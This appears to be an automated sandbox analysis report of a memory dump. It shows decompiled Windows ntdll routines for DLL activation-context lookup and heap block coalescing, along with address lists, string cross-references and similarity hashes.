0x01051d14
0x0100a2cd
0x0100a2d2
0x0100a2d9
0x01051d5a
0x0100a2df
0x0100a2df
0x0100a2df
0x0100a2e4
0x01051d69
0x01051d6b
0x01051d76
0x01051d76
0x01051d76
0x01051d91
0x01051d91
0x0100a2ea
0x0100a2f0
0x0100a2f5
0x01051da8
0x01051dad
0x01051dad
0x0100a2fd
0x0100a300
0x00000000

Strings

HEAP[%wZ]: , xrefs: 01051DD7
`, xrefs: 01051C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 01051DF9
HEAP: , xrefs: 01051DE4

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: eea6db5837b364e483c6b7347c001ff99e10fb9c58d86ed843a993e5c532baec
Instruction ID: 3e7ddd4e7cefc712fc385afca1c29e48789812bcbf0fe9290ee29adef6d1b5ce
Opcode Fuzzy Hash: eea6db5837b364e483c6b7347c001ff99e10fb9c58d86ed843a993e5c532baec
Instruction Fuzzy Hash: 9D51F5322057819FE352EB68C845F6B7BE8FB80750F0805A9F9D58B2D2D735E800CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01018E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01018E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x10dd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x10d8464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x10d5780 & 0x00000003) != 0) {
							E01065510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x10d5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0102B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x10d7984; // 0xb92af8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x10d8464; // 0x75150110
					 *0x10db1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01019B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x10d5780 & 0x00000005) != 0) {
						_push(_t49);
						E01065510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01018e0f
0x01018e16
0x01018e19
0x01018e1b
0x01018e21
0x01018e7f
0x01018e85
0x01059354
0x0105936c
0x01059371
0x0105937b
0x01059381
0x01059381
0x0105937b
0x01018e9d
0x01018e9d
0x01018e29
0x01018e2c
0x01018e38
0x01018e3e
0x01018e43
0x01018eb5
0x01018eb9
0x010592aa
0x010592af
0x010592e8
0x010592e8
0x010592af
0x01018eb9
0x01018e45
0x01018e53
0x01018e5b
0x01018e5f
0x01018e78
0x01018e78
0x01018e7d
0x01018ec3
0x01018ecd
0x01018ed2
0x01018ed2
0x01018ec5
0x01018ec5
0x00000000
0x01018e7d
0x01018e67
0x01018ea4
0x0105931a
0x00000000
0x00000000
0x01059320
0x01018ea4
0x01018e70
0x01059325
0x01059340
0x01059345
0x01059345
0x01018e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0105932A
LdrpFindDllActivationContext, xrefs: 01059331, 0105935D
minkernel\ntdll\ldrsnap.c, xrefs: 0105933B, 01059367
Querying the active activation context failed with status 0x%08lx, xrefs: 01059357

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
Instruction ID: bf6e8b670d3dce02e4afe05e7e438cb3b972545ec2925168cc7fe27021d82bd1
Opcode Fuzzy Hash: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
Instruction Fuzzy Hash: 46411931A003119EDBB5AA1C8849B7A76F4BB01348F05C1ABEDC497599E7789E8083C1

Uniqueness

Uniqueness Score: -1.00%

Function 010A49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 010A4A3D, 010A4AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 010A4A61
HEAP: , xrefs: 010A4A4A, 010A4A5D, 010A4A5F, 010A4AC4
This is located in the %s field of the heap header., xrefs: 010A4AD6

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: dd481e7c5c230bf6d35648b0614d2e90c93b76f3fadb3243c6542444dab99d89
Instruction ID: 578702495310785289416c4cd3edb78ac4e5358d8733bd4937b345863633b534
Opcode Fuzzy Hash: dd481e7c5c230bf6d35648b0614d2e90c93b76f3fadb3243c6542444dab99d89
Instruction Fuzzy Hash: 55313339200111EFD310DB98C896FAB73E8EF00720F5C4099F485DB292D7B8E840D66A

Uniqueness

Uniqueness Score: -1.00%

Function 010099BF, Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E010099BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0109FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E010AA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0103D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E00FEB150();
										} else {
											E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E00FEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x10d6378 = 1;
											asm("int3");
											 *0x10d6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0100A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0100A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0100BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E010AA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0100A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0100A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0103D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E00FEB150();
								} else {
									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E00FEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x10d6378 = 1;
									asm("int3");
									 *0x10d6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0109FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E010AA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0103D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E00FEB150();
													} else {
														E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E00FEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x10d6378 = 1;
														asm("int3");
														 *0x10d6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0100A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0100A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0100BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E010AA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0103D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E00FEB150();
													} else {
														E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E00FEB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x10d6378 = 1;
														asm("int3");
														 *0x10d6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0100A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0100A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0100BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0100BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x010099ca
0x010099cc
0x010099df
0x010099e3
0x010099f8
0x010099fb
0x010099fb
0x00000000
0x01009a48
0x01009a48
0x01009a4c
0x01009a51
0x01009a55
0x01009a61
0x01009a66
0x01009a68
0x01051457
0x0105145c
0x0105145c
0x01009a68
0x01009a6e
0x01009a71
0x01009a74
0x01009a76
0x01051466
0x01051469
0x01051469
0x0105146c
0x0105146e
0x01051471
0x01051474
0x01051477
0x01051479
0x0105159c
0x0105159c
0x0105159d
0x010515a6
0x010515ab
0x010515ab
0x00000000
0x010515ab
0x0105147f
0x01051481
0x00000000
0x00000000
0x0105148a
0x0105148d
0x01051493
0x01051495
0x010514c0
0x010514c0
0x010514c3
0x010514c6
0x010514c8
0x010514cb
0x010514cf
0x010514f2
0x010514f2
0x010514f5
0x010514f8
0x01051501
0x01051508
0x0105150b
0x0105150e
0x01051510
0x01051513
0x01051515
0x01051515
0x01051518
0x01051518
0x01051513
0x01051521
0x01051525
0x0105152a
0x0105152d
0x01051530
0x01051532
0x01051539
0x0105153d
0x0105155d
0x01051562
0x0105153f
0x01051555
0x0105155a
0x01051570
0x01051577
0x0105157c
0x01051582
0x01051585
0x01051589
0x0105158b
0x01051592
0x01051593
0x01051593
0x01051589
0x01051530
0x00000000
0x010514f8
0x010514d5
0x010514da
0x010514dc
0x00000000
0x010514de
0x010514e8
0x00000000
0x010514e8
0x01051497
0x01051497
0x010514a4
0x010514a4
0x010514a7
0x010514a9
0x010514ab
0x010514ab
0x0105149c
0x0105149e
0x010514a0
0x010514b0
0x010514b0
0x00000000
0x010514a2
0x010514a2
0x00000000
0x010514a2
0x010514a0
0x010514b3
0x010514bb
0x00000000
0x010514bb
0x01051495
0x01009a7c
0x01009a7c
0x01009a7f
0x01009a7f
0x01009a82
0x01009a84
0x01009a87
0x01009a8a
0x01009a8d
0x01009a8f
0x0105166a
0x0105166a
0x0105166b
0x01051674
0x00000000
0x01051674
0x01009a95
0x01009a97
0x00000000
0x00000000
0x01009aa0
0x01009aa3
0x01009aa9
0x01009aab
0x01009ad7
0x01009ad7
0x01009ada
0x01009add
0x01009adf
0x01009ae2
0x01009ae6
0x01009b22
0x01009b27
0x01009b29
0x00000000
0x01009b2b
0x010515be
0x00000000
0x010515be
0x01009b29
0x01009ae8
0x01009ae8
0x01009aeb
0x01009aee
0x010515cb
0x010515d2
0x010515d5
0x010515d7
0x010515da
0x010515dc
0x010515dc
0x010515dc
0x010515da
0x010515e5
0x010515e9
0x010515ee
0x010515f1
0x010515f3
0x010515f9
0x01051600
0x01051604
0x01051624
0x01051629
0x01051606
0x0105161c
0x01051621
0x01051637
0x0105163e
0x01051643
0x01051649
0x0105164c
0x01051650
0x01051656
0x0105165d
0x0105165e
0x0105165e
0x01051650
0x010515f3
0x01009af4
0x01009af7
0x01009afc
0x01009b00
0x01009b04
0x01009b08
0x01009b14
0x010099fe
0x01009a04
0x01009a07
0x00000000
0x01009a29
0x0105169c
0x010516a0
0x010516a5
0x010516a9
0x010516b5
0x010516ba
0x010516bc
0x010516be
0x010516c3
0x010516c3
0x010516bc
0x010516c8
0x010516cc
0x0105181b
0x0105181b
0x0105181e
0x0105181e
0x01051821
0x01051823
0x01051826
0x01051829
0x0105182c
0x0105182e
0x01051688
0x01051688
0x01051689
0x0105168b
0x0105168c
0x0105168d
0x0105168f
0x01051692
0x00000000
0x01051692
0x01051834
0x01051836
0x00000000
0x00000000
0x0105183f
0x01051842
0x01051848
0x0105184a
0x01051875
0x01051875
0x01051878
0x0105187b
0x0105187d
0x01051880
0x01051884
0x010518a7
0x010518a7
0x010518aa
0x010518ad
0x010518b6
0x010518bd
0x010518c0
0x010518c3
0x010518c5
0x010518c8
0x010518ca
0x010518ca
0x010518cd
0x010518cd
0x010518c8
0x010518d5
0x010518da
0x010518df
0x010518e2
0x010518e5
0x010518e7
0x010518ee
0x010518f2
0x01051912
0x01051917
0x010518f4
0x0105190a
0x0105190f
0x01051925
0x0105192c
0x01051931
0x0105193a
0x0105193e
0x01051940
0x01051947
0x01051948
0x01051948
0x0105193e
0x010518e5
0x0105194f
0x01051952
0x01051956
0x0105195d
0x01051961
0x0105196d
0x00000000
0x0105196d
0x0105188a
0x0105188f
0x01051891
0x00000000
0x00000000
0x0105189d
0x00000000
0x0105189d
0x0105184c
0x01051859
0x01051859
0x0105185c
0x00000000
0x00000000
0x01051851
0x01051853
0x01051855
0x01051865
0x01051865
0x01051866
0x01051868
0x01051870
0x00000000
0x01051870
0x01051857
0x01051857
0x0105185e
0x00000000
0x010516d2
0x010516d2
0x010516d5
0x010516d5
0x010516d8
0x010516da
0x010516dd
0x010516e0
0x010516e3
0x010516e5
0x01051808
0x01051808
0x01051809
0x01051812
0x01051817
0x01051817
0x00000000
0x01051817
0x010516eb
0x010516ed
0x00000000
0x00000000
0x010516f6
0x010516f9
0x010516ff
0x01051701
0x0105172c
0x0105172c
0x0105172f
0x01051732
0x01051734
0x01051737
0x0105173b
0x0105175e
0x0105175e
0x01051761
0x01051764
0x0105176d
0x01051774
0x01051777
0x0105177a
0x0105177c
0x0105177f
0x01051781
0x01051781
0x01051784
0x01051784
0x0105177f
0x0105178c
0x01051791
0x01051796
0x01051799
0x0105179c
0x0105179e
0x010517a5
0x010517a9
0x010517c9
0x010517ce
0x010517ab
0x010517c1
0x010517c6
0x010517dc
0x010517e3
0x010517e8
0x010517ee
0x010517f1
0x010517f5
0x010517f7
0x010517fe
0x010517ff
0x010517ff
0x010517f5
0x0105179c
0x00000000
0x01051764
0x01051741
0x01051746
0x01051748
0x00000000
0x00000000
0x01051754
0x00000000
0x01051754
0x01051703
0x01051710
0x01051710
0x01051713
0x00000000
0x00000000
0x01051708
0x0105170a
0x0105170c
0x0105171c
0x0105171c
0x0105171d
0x0105171f
0x01051727
0x00000000
0x01051727
0x0105170e
0x0105170e
0x01051715
0x00000000
0x01051715
0x010516cc
0x01009a45
0x01009a45
0x01009a0e
0x01009a1c
